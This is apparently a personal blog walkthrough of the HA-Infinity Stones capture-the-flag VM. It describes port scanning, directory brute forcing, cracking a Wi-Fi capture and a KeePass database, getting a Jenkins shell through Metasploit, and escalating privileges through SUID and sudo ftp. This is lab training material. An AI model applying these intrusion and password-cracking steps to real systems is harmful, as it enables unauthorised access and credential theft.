HA-Infinity Stones Walkthrough
Hello,HA-Infinity stones ,This is my first time i’m doing this virtual machine.So i don’t know about anything.We’ll discuss deeply in our walkthrough.Before going This vm comes with bridged network adapter,let’s set our attacker machine to bridged. our main goal is to find all the infinity stones.Now let’s Begin.
Let’s find out the IP of Victim’s machine by using “netdiscover”
By the way i’m using kali 2018.2 as my attacker machine.
so 192.168.0.104 is the victim’s IP . Without any delay let’s scan the victim for open ports.
“nmap -A 192.168.0.104 -vv”.That gave me this
So it is running 4 services ssh,http,ssl/http and again http.It is running OpenSSH 7.6 p1 on port 22 ,apache httpd 2.3.29 on port 80,ssl/http on port 443 and Jetty 9.4.z on port 8080.SO let’s begin with port 80.FireUp firefox and see what’s inside.
hmm.. It’s showing some stones. After going through the page source i found nothing.But there is an another page named “aether” in left top corner.Let’s open it.
It asking some quiz.But after reading it carefully it says “Binary is the path to Reality”.This means Binary answers from these questions gives us a directory.But really i don’t know the answers,i will take lot of time to search and answer these questions.So i’ve decided to bruteforce it.Let’s create a wordlist containing 8 digit binary directories because there are 8 questions and 8 questions will have 8 answers in ‘0’s & ‘1’s.For creating a directory we’ll call crunch to get the job done.
“crunch 8 8 10 > path.txt” This will create our list.
For Bruteforcing we’ll use ‘dirb’
“dirb http://192.168.0.104 path.txt” And this got me this.
Let’s open this directory and see what’s inside.
OK we have something hints.txt. Let’s open it
We have this.What is this? Well it’s an encoding algorithm.It is brain fuck alogorithm .
https://www.splitbrain.org/services/ook use can decrypt form here.After decoding i got this
Ok.Some credentials But i don’t how to use and where i want to use them.Let’s find something where we can use these credentials.I think we found something we are looking for in port 80.Let’s move into port 443.
Let’s go into : “https://192.168.0.104:443”
Again we got the same thing.But we’ve scanned it by using nmap.Let’s look at the results once again so that we can find some information.
Ok.Look into it carefully,The ssl-certificate gives us the MINDSTONE.Let’s save it in a text file.And this ssl-certificate contains an email belongs to aarti.Emailfirstname.lastname@example.org tried to find something useful,but found nothing.Then i’ve decided to bruteforce the directories.For this i’m going to use dirbuster.
Type “dirbuster” in terminal to open it. and i’ve used lowecase medium wordlist which is availble in ‘/usr/share/wordlists/dirbuster/’.And i’ve got these directories.
Ok we’ve one folder and two files.First file is a password file and it look like this.
This shows an hint for a password So let’s use crunch to produce a wordlist that matches this.According to the hint it says it contains “gam”starting and contains one uppercase char,two numbers,two lowercase in the middle and year of avenger.Let’s call upon crunch.
“crunch 12 12 -t gam,%%@@2012 >pass.txt”
By using this wordlist let’s crack the reality.cap file,using aircrack
“aircrack-ng reality.cap -w pass.txt”
after cracking we got this password.
So we’ve found this thing.i think it may be a directory.Let’s try
OK After going into “https://192.168.0.104/gamA00fe2012” i got this
Finally we’ve got realitystone .Let’s open it and i’ve got this
Ok we have reality stone and mind stone.Let’s find the remaining stones.For Third stone i’ve done a directory bruteforce on port 80 to find the files.Becuase we’ve done to 443 and aslo 8080.After doing it with drib
“dib http://192.168.0.104” .I’ve found a folder named ‘img’ in that we got something.
After opening this we it’s an image containing Tesseract nothing more.So i’ve downloaded to take a look at the metadata.After checking the metadata i’ve go one more stone that is ‘spacestone’
So here is the space stone,copy it and save it a text file that we are collecting all the stones in one text file.Next thing,we have jenkins here so let’s find some exploits for jenkins script console.we’ve got the credentials before “admin:avengers” in the above screenshots.So,let’s open metasploit to get the work done.
After going with metasploit i got some jenkins exploits.
So in this i’m going to use ‘jenkins_script_console” to get the shell..So By using below commands i’ve successfully gained the shell
To convert this meterpreter into shell,i’m going to use python to gain the shell.Below screenshot will show you how to gain a shell
Now we’ve successfully gained a shell.now it’s time to exploit the system.Let’s go.We have to find whta jenkins can run with sudo permission.to know that we’ll use ‘find’
“find / -perm -u=s -type f 2>/dev/null” and gives the output as shown below:
As we can see, ‘opt/script’ can run with sudo rights so let’s exploit by using that script.Let’s go.
This script gave me the time stone and it is 4th stone and two more stones to go..Ok.we need to search more to find those two.Let’s go
there’s a file morag.kdbx it’s a database file.Before opening it we want to find it’s key to open it.So,Let’s convert it into hash and then we’ll use john to crack.Let’s go…
“keepass2john morag.kdbx > hash”
To use john “john hash” and it will do the remaining work.
I’ve already cracked it once,but forgot to take screenshot.Ok we got the password let’s open the morag.kdbx.To open this kind of files we need keepass.You can download it from web.i’m using it in mac.so let’s open the file and enter the password “princesa”.After investigating i’ve found the power stone
We’ve found power stone.So.after looking into deep i’ve some credentials.
It is base64 encrypted.let’s decode them.To decode them we’ll use preinstalled decoder in our system.
It says “morag:yondu” may be they are ssh credentials.So,let’s login with ssh
“ssh email@example.com” and enter the password “yondu”
Now it’s time for privilage escalation.After some investigation i’ve found something new in morag
Morag can run ftp with sudo rights without password.let’s exploit the root with ftp.
And then we are done. Let’s open the final flag to get the soul stone.
“I’m inevitable” Buddy i’ve got all 6 stones.We’ve successfully completed our mission.If u have doubts please let me know..
Follow for more writeup’s: